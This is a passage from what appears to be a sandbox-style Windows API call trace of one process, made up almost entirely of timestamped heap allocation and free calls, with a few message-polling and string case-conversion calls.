(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.804] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.807] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0200.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.809] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0200.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.812] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.812] HeapFree (in: hHeap=0x25c0000, 